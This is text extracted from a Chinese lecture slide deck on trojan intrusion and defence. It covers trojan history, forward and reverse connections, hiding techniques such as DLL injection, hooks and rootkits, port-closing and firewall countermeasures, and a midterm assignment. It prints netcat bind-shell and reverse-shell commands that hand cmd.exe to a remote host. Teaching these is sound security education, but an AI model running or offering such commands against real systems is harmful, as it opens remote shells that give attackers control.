基于木马的入侵与防范.pptVIP

基于木马的入侵之三--木马的新技术和防范手段 田宏政 木马的发展史 第一代：以对付UNIX为主。针对WINDOS的只有BO、Netspy。 第二代：国外－BO2000、Sub7; 国内－冰河、广外女生。 第三代：灰鸽子 第四代：广外幽灵、广外男生 木马的新技术 木马已经成为黑客巩固战果，提高入侵效率的常见工具 一个木马是否优秀，关键是远程控制能力隐藏能力 连接方式： 分为正向连接和反向连接 传统的木马由控制端主动连接受控端 ----正向连接 如冰河木马，由控制端发起连接信号。 优点：方便控制，随时可以控制（只要对方开机） 缺点：大部分的防火墙都可以通过关闭端口限制木马的控制功能以及阻止大部分由外而内的网络连接。 例：冰河木马的连接过程 “端口反弹” 木马——反向连接 “反弹端口”木马由受控端连接控制端 优点：清楚地了解哪些机器是受控端，有目的地控制 由被控端发起连接信号，能骗过部分防火墙的拦截 被控端自动上线，免去控制端的搜索之苦 灰鸽子是典型代表 Nc——可用作木马 Nc具有很强大的功能，可以作为一个木马。而且，即可以作为传统的木马，也可以作为端口反弹木马 Nc作为传统木马（正向连接） 受控端先运行：nc -l -p 888 -e cmd.exe 控制端运行：nc 192.168.1.1 888 Nc作为端口反弹木马（反向连接） 控制端先运行：nc -l -p 888 被控端运行nc 192.168.1.1 888 -e cmd.exe 灰鸽子木马的新技术 灰鸽子木马采用了多种木马的新技术。 反向连接，受害者一开机就被控制 dll进程插入，没有额外的附加进程 rootkit技术，通过一般方法无法察看木马使用的网络端口情况，也查看不到木马文件 木马的隐藏技术 伪装成正常的进程名 隐藏进程名 Dll注入，Hook 替换系统的dll 编写系统核心驱动 较新的木马隐藏技术 函数Hook（Windows中提供的一种用以替换DOS下“中断”的系统机制，中文译为“挂钩” ） 线程插入 内核级木马（相对于用户级，如普通的进程型木马，dll木马） 通过修改内核功能，达到隐藏自身的目的 木马的清除与防范手段 1、关闭不需要的端口 关闭135端口 方法一：禁用Remote Procedure Call服务。 方法二：禁用DCOM。用dcomcnfg.exe命令。 关闭UDP123端口 禁用windows time服务 关闭137/138端口 禁用NetBIOS协议 关闭139/445端口 在“本地安全策略”中建立IP筛选器 关闭1900端口 停止SSDP Discovery Service服务 2、安装防火墙 Windows 自带防火墙 ADSL猫防火墙：设置为NAT方式。 其它软件防火墙 3、网页木马防范 升级到IE6.0以上 提高安全级别（在IE选项中） 禁用远程注册表（Remote Registry)服务 安装防毒杀毒和防木马软件 常用木马清除软件 木马克星 木马清道夫 Windows 清理助手 木马清道夫防火墙 期中考查小论文要求说明 详见 调查研究 第二代木马与第三、第四代木马之间有何重要的不同之处？ 木马程序在网络管理中的作用怎么样？ * * 装有控制端的A机 扫描开放了7626端口的主机(冰河木马) 获得B机的IP地址 B机的木马程序(服务器端)作出响应 向B机发出连接信号 A机开启一个随机端口(如2001)与B机的7626端口建立连接 控制端 受控端 木马的危害极大，那么要如何预防木马呢?通过前面对多种木马的介绍，大家不难看出，木马要发挥作用，必须先将木马服务器程序植入到目标计算机中，然后打开一个监听端口与控制端建立连接。 因此，预防木马最好的办法是正确配置系统，科学管理计算机各个端口，关闭无用端口，不运行来历不明的程序，从根本上杜绝木马程序的侵入。下面来看几种常见的木马的预防方法。 期中考查要求及说明.doc